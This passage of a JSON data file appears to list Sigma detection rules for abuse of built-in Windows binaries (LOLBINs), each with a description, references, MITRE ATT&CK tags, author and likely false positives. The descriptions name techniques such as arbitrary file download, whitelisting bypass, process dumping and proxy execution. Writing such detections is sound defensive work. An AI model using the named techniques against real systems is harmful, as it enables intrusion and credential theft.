"proc_creation_win_lolbin_mftrace.yml", - "author": "Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "Legitimate use for tracing purposes" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects 
execution of \"msdt.exe\" using an answer file which is simulating the legitimate way of calling msdt via \"pcwrun.exe\" (For example from the compatibility tab)", - "uuid": "9c8c7000-3065-44a8-a555-79bcba5d9955", - "value": "Execute MSDT Via Answer File", - "meta": { - "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Msdt/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_msdt_answer_file.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218", - "attack.execution" - ], - "creation_date": "2022/06/13", - "filename": "proc_creation_win_lolbin_msdt_answer_file.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Possible undocumented parents of \"msdt\" other than \"pcwrun\"" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects usage of \"MSOHTMED\" to download arbitrary files", - "uuid": "459f2f98-397b-4a4a-9f47-6a5ec2f1c69d", - "value": "Download Arbitrary Files Via MSOHTMED.EXE", - "meta": { - "refs": [ - "https://github.com/LOLBAS-Project/LOLBAS/pull/238/files", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_msohtmed_download.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.execution", - "attack.t1218" - ], - "creation_date": "2022/08/19", - "filename": "proc_creation_win_lolbin_msohtmed_download.yml", - "author": "Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects usage of \"MSPUB\" (Microsoft Publisher) to download arbitrary files", - "uuid": "3b3c7f55-f771-4dd6-8a6e-08d057a17caf", - "value": "Download Arbitrary Files Via MSPUB.EXE", - "meta": { - "refs": [ - "https://github.com/LOLBAS-Project/LOLBAS/pull/238/files", - 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_mspub_download.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.execution", - "attack.t1218" - ], - "creation_date": "2022/08/19", - "filename": "proc_creation_win_lolbin_mspub_download.yml", - "author": "Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects LOLBINs executing from an abnormal drive such as a mounted ISO.", - "uuid": "d4ca7c59-e9e4-42d8-bf57-91a776efcb87", - "value": "LOLBIN From Abnormal Drive", - "meta": { - "refs": [ - "https://thedfirreport.com/2021/12/13/diavol-ransomware/", - "https://www.scythe.io/library/threat-emulation-qakbot", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_not_from_c_drive.yml" - ], - "tags": [ - "attack.t1218.001" - ], - "creation_date": "2022/01/25", - "filename": "proc_creation_win_lolbin_not_from_c_drive.yml", - "author": "Christopher Peacock '@securepeacock', SCYTHE '@scythe_io'", - "level": "medium", - "falsepositive": [ - "Rare false positives could occur on servers with multiple drives." 
- ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Use OfflineScannerShell.exe to execute mpclient.dll library in the current working directory", - "uuid": "02b18447-ea83-4b1b-8805-714a8a34546a", - "value": "Suspicious OfflineScannerShell.exe Execution From Another Folder", - "meta": { - "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/OfflineScannerShell/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_offlinescannershell.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218" - ], - "creation_date": "2022/03/06", - "filename": "proc_creation_win_lolbin_offlinescannershell.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects usage of OpenConsole binary as a LOLBIN to launch other binaries to bypass application Whitelisting", - "uuid": "814c95cc-8192-4378-a70a-f1aafd877af1", - "value": "Use of OpenConsole", - "meta": { - "refs": [ - "https://twitter.com/nas_bench/status/1537563834478645252", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_openconsole.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059" - ], - "creation_date": "2022/06/16", - "filename": "proc_creation_win_lolbin_openconsole.yml", - "author": "Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "Legitimate use by an administrator" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Execute commands and binaries from the context of The program compatibility assistant (Pcalua.exe). 
This is used as a LOLBIN for example to bypass application whitelisting.", - "uuid": "0955e4e1-c281-4fb9-9ee1-5ee7b4b754d2", - "value": "Use of Pcalua For Execution", - "meta": { - "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Pcalua/", - "https://pentestlab.blog/2020/07/06/indirect-command-execution/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_pcalua.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059" - ], - "creation_date": "2022/06/14", - "filename": "proc_creation_win_lolbin_pcalua.yml", - "author": "Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "Legitimate use by a via a batch script or by an administrator." - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detect indirect command execution via Program Compatibility Assistant pcwrun.exe", - "uuid": "b97cd4b1-30b8-4a9d-bd72-6293928d52bc", - "value": "Indirect Command Execution By Program Compatibility Wizard", - "meta": { - "refs": [ - "https://twitter.com/pabraeken/status/991335019833708544", - "https://lolbas-project.github.io/lolbas/Binaries/Pcwrun/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_pcwrun.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218", - "attack.execution" - ], - "creation_date": "2020/10/12", - "filename": "proc_creation_win_lolbin_pcwrun.yml", - "author": "A. 
Sungurov , oscd.community", - "level": "low", - "falsepositive": [ - "Need to use extra processing with 'unique_count' / 'filter' to focus on outliers as opposed to commonly seen artifacts", - "Legit usage of scripts" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects indirect command execution via Program Compatibility Assistant \"pcwrun.exe\" leveraging the follina (CVE-2022-30190) vulnerability", - "uuid": "6004abd0-afa4-4557-ba90-49d172e0a299", - "value": "Execute Pcwrun.EXE To Leverage Follina", - "meta": { - "refs": [ - "https://twitter.com/nas_bench/status/1535663791362519040", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_pcwrun_follina.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218", - "attack.execution" - ], - "creation_date": "2022/06/13", - "filename": "proc_creation_win_lolbin_pcwrun_follina.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Tools to Capture Network Packets on the windows 10 with October 2018 Update or later.", - "uuid": "f956c7c1-0f60-4bc5-b7d7-b39ab3c08908", - "value": "Use of PktMon.exe", - "meta": { - "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Pktmon/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_pktmon.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1040" - ], - "creation_date": "2022/03/17", - "filename": "proc_creation_win_lolbin_pktmon.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Legitimate use" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects usage of \"PresentationHost\" which is a utility that runs \".xbap\" (Browser Applications) 
files. It can be abused to run malicious \".xbap\" files any bypass AWL", - "uuid": "d22e2925-cfd8-463f-96f6-89cec9d9bc5f", - "value": "Application Whitelisting Bypass via PresentationHost.exe", - "meta": { - "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Presentationhost/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_presentationhost.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.execution", - "attack.t1218" - ], - "creation_date": "2022/07/01", - "filename": "proc_creation_win_lolbin_presentationhost.yml", - "author": "Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "Legitimate \".xbap\" being executed via \"PresentationHost\"" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects usage of \"PresentationHost\" which is a utility that runs \".xbap\" (Browser Applications) files to download arbitrary files", - "uuid": "b124ddf4-778d-418e-907f-6dd3fc0d31cd", - "value": "Download Arbitrary Files Via PresentationHost.exe", - "meta": { - "refs": [ - "https://github.com/LOLBAS-Project/LOLBAS/pull/239/files", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_presentationhost_download.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.execution", - "attack.t1218" - ], - "creation_date": "2022/08/19", - "filename": "proc_creation_win_lolbin_presentationhost_download.yml", - "author": "Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the execution of the LOLBIN PrintBrm.exe, which can be used to create or extract ZIP files. 
PrintBrm.exe should not be run on a normal workstation.", - "uuid": "cafeeba3-01da-4ab4-b6c4-a31b1d9730c7", - "value": "PrintBrm ZIP Creation of Extraction", - "meta": { - "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/PrintBrm/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_printbrm.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1105", - "attack.defense_evasion", - "attack.t1564.004" - ], - "creation_date": "2022/05/02", - "filename": "proc_creation_win_lolbin_printbrm.yml", - "author": "frack113", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the use of the 'Pubprn.vbs' Microsoft signed script to execute commands.", - "uuid": "1fb76ab8-fa60-4b01-bddd-71e89bf555da", - "value": "Pubprn.vbs Proxy Execution", - "meta": { - "refs": [ - "https://lolbas-project.github.io/lolbas/Scripts/Pubprn/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_pubprn.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1216.001" - ], - "creation_date": "2022/05/28", - "filename": "proc_creation_win_lolbin_pubprn.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects using Rasautou.exe for loading arbitrary .DLL specified in -d option and executes the export specified in -p.", - "uuid": "cd3d1298-eb3b-476c-ac67-12847de55813", - "value": "DLL Execution via Rasautou.exe", - "meta": { - "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Rasautou/", - "https://github.com/fireeye/DueDLLigence", - "https://www.fireeye.com/blog/threat-research/2019/10/staying-hidden-on-the-endpoint-evading-detection-with-shellcode.html", - 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_rasautou_dll_execution.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218" - ], - "creation_date": "2020/10/09", - "filename": "proc_creation_win_lolbin_rasautou_dll_execution.yml", - "author": "Julia Fomina, oscd.community", - "level": "medium", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious execution of Regasm/Regsvcs utilities", - "uuid": "cc368ed0-2411-45dc-a222-510ace303cb2", - "value": "Regasm/Regsvcs Suspicious Execution", - "meta": { - "refs": [ - "https://www.fortiguard.com/threat-signal-report/4718?s=09", - "https://lolbas-project.github.io/lolbas/Binaries/Regasm/", - "https://lolbas-project.github.io/lolbas/Binaries/Regsvcs/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_regasm.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218.009" - ], - "creation_date": "2022/08/25", - "filename": "proc_creation_win_lolbin_regasm.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the use of a Microsoft signed script 'REGISTER_APP.VBS' to register a VSS/VDS Provider as a COM+ application.", - "uuid": "1c8774a0-44d4-4db0-91f8-e792359c70bd", - "value": "REGISTER_APP.VBS Proxy Execution", - "meta": { - "refs": [ - "https://twitter.com/sblmsrsn/status/1456613494783160325?s=20", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_register_app.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218" - ], - "creation_date": "2022/08/19", - "filename": "proc_creation_win_lolbin_register_app.yml", - "author": "Nasreddine Bencherchali", - "level": 
"medium", - "falsepositive": [ - "Legitimate usage of the script. Always investigate what's being registered to confirm if it's benign" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Remote.exe is part of WinDbg in the Windows SDK and can be used for AWL bypass and running remote files.", - "uuid": "4eddc365-79b4-43ff-a9d7-99422dc34b93", - "value": "Use of Remote.exe", - "meta": { - "refs": [ - "https://blog.thecybersecuritytutor.com/Exeuction-AWL-Bypass-Remote-exe-LOLBin/", - "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Remote/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_remote.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1127" - ], - "creation_date": "2022/06/02", - "filename": "proc_creation_win_lolbin_remote.yml", - "author": "Christopher Peacock @SecurePeacock, SCYTHE @scythe_io", - "level": "medium", - "falsepositive": [ - "Approved installs of Windows SDK with Debugging Tools for Windows (WinDbg)." 
- ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the use of Replace.exe which can be used to replace file with another file", - "uuid": "9292293b-8496-4715-9db6-37028dcda4b3", - "value": "Replace.exe Usage", - "meta": { - "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Replace/", - "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/replace", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_replace.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1105" - ], - "creation_date": "2022/03/06", - "filename": "proc_creation_win_lolbin_replace.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "An attacker may execute an application as a SCR File using rundll32.exe desk.cpl,InstallScreenSaver", - "uuid": "15bd98ea-55f4-4d37-b09a-e7caa0fa2221", - "value": "Rundll32 InstallScreenSaver Execution", - "meta": { - "refs": [ - "https://lolbas-project.github.io/lolbas/Libraries/Desk/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_rundll32_installscreensaver.yml" - ], - "tags": [ - "attack.t1218.011", - "attack.defense_evasion" - ], - "creation_date": "2022/04/28", - "filename": "proc_creation_win_lolbin_rundll32_installscreensaver.yml", - "author": "Christopher Peacock @securepeacock, SCYTHE @scythe_io, TactiKoolSec", - "level": "medium", - "falsepositive": [ - "Legitimate installation of a new screensaver" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "The \"ScriptRunner.exe\" binary can be abused to proxy execution through it and bypass possible whitelisting", - "uuid": "64760eef-87f7-4ed3-93fd-655668ea9420", - "value": "Use of 
Scriptrunner.exe", - "meta": { - "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Scriptrunner/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_scriptrunner.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.execution", - "attack.t1218" - ], - "creation_date": "2022/07/01", - "filename": "proc_creation_win_lolbin_scriptrunner.yml", - "author": "Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "Legitimate use when App-v is deployed" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects using SettingSyncHost.exe to run hijacked binary", - "uuid": "b2ddd389-f676-4ac4-845a-e00781a48e5f", - "value": "Using SettingSyncHost.exe as LOLBin", - "meta": { - "refs": [ - "https://www.hexacorn.com/blog/2020/02/02/settingsynchost-exe-as-a-lolbin", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_settingsynchost.yml" - ], - "tags": [ - "attack.execution", - "attack.defense_evasion", - "attack.t1574.008" - ], - "creation_date": "2020/02/05", - "filename": "proc_creation_win_lolbin_settingsynchost.yml", - "author": "Anton Kutepov, oscd.community", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the usage of the \"sftp.exe\" binary as a LOLBIN by abusing the \"-D\" flag", - "uuid": "a85ffc3a-e8fd-4040-93bf-78aff284d801", - "value": "Use Of The SFTP.EXE Binary As A LOLBIN", - "meta": { - "refs": [ - "https://github.com/LOLBAS-Project/LOLBAS/pull/264", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_sftp.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.execution", - "attack.t1218" - ], - "creation_date": "2022/11/10", - "filename": "proc_creation_win_lolbin_sftp.yml", - 
"author": "Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the execution utitilies often found in Visual Studio tools that hardcode the call to the binary \"link.exe\". They can be abused to sideload any binary with the same name", - "uuid": "6e968eb1-5f05-4dac-94e9-fd0c5cb49fd6", - "value": "Sideloading Link.EXE", - "meta": { - "refs": [ - "https://twitter.com/0gtweet/status/1560732860935729152", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_sideload_link_binary.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218" - ], - "creation_date": "2022/08/22", - "filename": "proc_creation_win_lolbin_sideload_link_binary.yml", - "author": "Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the execution of sigverif binary as a parent process which could indicate it being used as a LOLBIN to proxy execution", - "uuid": "7d4aaec2-08ed-4430-8b96-28420e030e04", - "value": "Suspicious Sigverif Execution", - "meta": { - "refs": [ - "https://www.hexacorn.com/blog/2018/04/27/i-shot-the-sigverif-exe-the-gui-based-lolbin/", - "https://twitter.com/0gtweet/status/1457676633809330184", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_sigverif.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1216" - ], - "creation_date": "2022/08/19", - "filename": "proc_creation_win_lolbin_sigverif.yml", - "author": "Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "The \"Squirrel.exe\" binary that is part of multiple software 
(Slack, Teams, Discord...etc) can be used as a LOLBIN", - "uuid": "45239e6a-b035-4aaf-b339-8ad379fcb67e", - "value": "Use of Squirrel.exe", - "meta": { - "refs": [ - "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Squirrel/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_squirrel.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.execution" - ], - "creation_date": "2022/06/09", - "filename": "proc_creation_win_lolbin_squirrel.yml", - "author": "Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "See rule (fa4b21c9-0057-4493-b289-2556416ae4d7) for possible FPs" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious LOLBIN AccCheckConsole execution with parameters as used to load an arbitrary DLL", - "uuid": "0f6da907-5854-4be6-859a-e9958747b0aa", - "value": "Suspicious LOLBIN AccCheckConsole", - "meta": { - "refs": [ - "https://gist.github.com/bohops/2444129419c8acf837aedda5f0e7f340", - "https://twitter.com/bohops/status/1477717351017680899?s=12", - "https://lolbas-project.github.io/lolbas/OtherMSBinaries/AccCheckConsole/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_susp_acccheckconsole.yml" - ], - "tags": [ - "attack.execution" - ], - "creation_date": "2022/01/06", - "filename": "proc_creation_win_lolbin_susp_acccheckconsole.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Legitimate use of the UI Accessibility Checker" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Atbroker executing non-deafualt Assistive Technology applications", - "uuid": "f24bcaea-0cd1-11eb-adc1-0242ac120002", - "value": "Suspicious Atbroker Execution", - "meta": { - "refs": [ - "http://www.hexacorn.com/blog/2016/07/22/beyond-good-ol-run-key-part-42/", - 
"https://lolbas-project.github.io/lolbas/Binaries/Atbroker/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_susp_atbroker.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218" - ], - "creation_date": "2020/10/12", - "filename": "proc_creation_win_lolbin_susp_atbroker.yml", - "author": "Mateusz Wydra, oscd.community", - "level": "high", - "falsepositive": [ - "Legitimate, non-default assistive technology applications execution" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects a suspicious certreq execution taken from the LOLBAS examples, which can be abused to download (small) files", - "uuid": "4480827a-9799-4232-b2c4-ccc6c4e9e12b", - "value": "Suspicious Certreq Command to Download", - "meta": { - "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Certreq/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_susp_certreq_download.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1105" - ], - "creation_date": "2021/11/24", - "filename": "proc_creation_win_lolbin_susp_certreq_download.yml", - "author": "Christian Burkard", - "level": "high", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects when a possible suspicious driver is being installed via pnputil.exe lolbin", - "uuid": "a2ea3ae7-d3d0-40a0-a55c-25a45c87cac1", - "value": "Suspicious Driver Install by pnputil.exe", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/windows-hardware/drivers/devtest/pnputil-command-syntax", - "https://strontic.github.io/xcyclopedia/library/pnputil.exe-60EDC5E6BDBAEE441F2E3AEACD0340D2.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_susp_driver_installed_by_pnputil.yml" - ], - "tags": [ - 
"attack.persistence", - "attack.t1547" - ], - "creation_date": "2021/09/30", - "filename": "proc_creation_win_lolbin_susp_driver_installed_by_pnputil.yml", - "author": "Hai Vaknin @LuxNoBulIshit, Avihay eldad @aloneliassaf, Austin Songer @austinsonger", - "level": "medium", - "falsepositive": [ - "Pnputil.exe being used may be performed by a system administrator.", - "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", - "Pnputil.exe being executed from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects execution of of Dxcap.exe", - "uuid": "60f16a96-db70-42eb-8f76-16763e333590", - "value": "Application Whitelisting Bypass via Dxcap.exe", - "meta": { - "refs": [ - "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Dxcap/", - "https://twitter.com/harr0ey/status/992008180904419328", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_susp_dxcap.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218" - ], - "creation_date": "2019/10/26", - "filename": "proc_creation_win_lolbin_susp_dxcap.yml", - "author": "Beyu Denis, oscd.community, Nasreddine Bencherchali (update)", - "level": "medium", - "falsepositive": [ - "Legitimate execution of dxcap.exe by legitimate user" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the suspicious execution of a utility to convert Windows 3.x .grp files or for persistence purposes by malicious software or actors", - "uuid": "f14e169e-9978-4c69-acb3-1cff8200bc36", - "value": "Suspicious GrpConv Execution", - "meta": { - "refs": [ - "https://twitter.com/0gtweet/status/1526833181831200770", - 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_susp_grpconv.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1547" - ], - "creation_date": "2022/05/19", - "filename": "proc_creation_win_lolbin_susp_grpconv.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detect the use of Windows Defender to download payloads", - "uuid": "46123129-1024-423e-9fae-43af4a0fa9a5", - "value": "Windows Defender Download Activity", - "meta": { - "refs": [ - "https://web.archive.org/web/20200903194959/https://twitter.com/djmtshepana/status/1301608169496612866", - "https://lolbas-project.github.io/lolbas/Binaries/MpCmdRun/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_susp_mpcmdrun_download.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218", - "attack.command_and_control", - "attack.t1105" - ], - "creation_date": "2020/09/04", - "filename": "proc_creation_win_lolbin_susp_mpcmdrun_download.yml", - "author": "Matthew Matchen", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects process dump via legitimate sqldumper.exe binary", - "uuid": "23ceaf5c-b6f1-4a32-8559-f2ff734be516", - "value": "Dumping Process via Sqldumper.exe", - "meta": { - "refs": [ - "https://twitter.com/countuponsec/status/910977826853068800", - "https://twitter.com/countuponsec/status/910969424215232518", - "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Sqldumper/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_susp_sqldumper_activity.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.001" - ], - "creation_date": "2020/10/08", - 
"filename": "proc_creation_win_lolbin_susp_sqldumper_activity.yml", - "author": "Kirill Kiryanov, oscd.community", - "level": "medium", - "falsepositive": [ - "Legitimate MSSQL Server actions" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects Possible usage of Windows Subsystem for Linux (WSL) binary as a LOLBIN", - "uuid": "dec44ca7-61ad-493c-bfd7-8819c5faa09b", - "value": "WSL Execution", - "meta": { - "refs": [ - "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Wsl/", - "https://twitter.com/nas_bench/status/1535431474429808642", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_susp_wsl.yml" - ], - "tags": [ - "attack.execution", - "attack.defense_evasion", - "attack.t1218", - "attack.t1202" - ], - "creation_date": "2020/10/05", - "filename": "proc_creation_win_lolbin_susp_wsl.yml", - "author": "oscd.community, Zach Stanford @svch0st, Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "Automation and orchestration scripts may use this method execute scripts etc", - "Legitimate use by Windows to kill processes opened via WSL (example VsCode WSL server)" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Executes arbitrary PowerShell code using SyncAppvPublishingServer.exe.", - "uuid": "fbd7c32d-db2a-4418-b92c-566eb8911133", - "value": "SyncAppvPublishingServer Execute Arbitrary PowerShell Code", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md", - "https://lolbas-project.github.io/lolbas/Binaries/Syncappvpublishingserver/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_syncappvpublishingserver_execute_psh.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218" - ], - "creation_date": 
"2021/07/12", - "filename": "proc_creation_win_lolbin_syncappvpublishingserver_execute_psh.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "App-V clients" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Executes arbitrary PowerShell code using SyncAppvPublishingServer.vbs", - "uuid": "36475a7d-0f6d-4dce-9b01-6aeb473bbaf1", - "value": "SyncAppvPublishingServer VBS Execute Arbitrary PowerShell Code", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1216/T1216.md", - "https://lolbas-project.github.io/lolbas/Binaries/Syncappvpublishingserver/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_syncappvpublishingserver_vbs_execute_psh.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218", - "attack.t1216" - ], - "creation_date": "2021/07/16", - "filename": "proc_creation_win_lolbin_syncappvpublishingserver_vbs_execute_psh.yml", - "author": "frack113", - 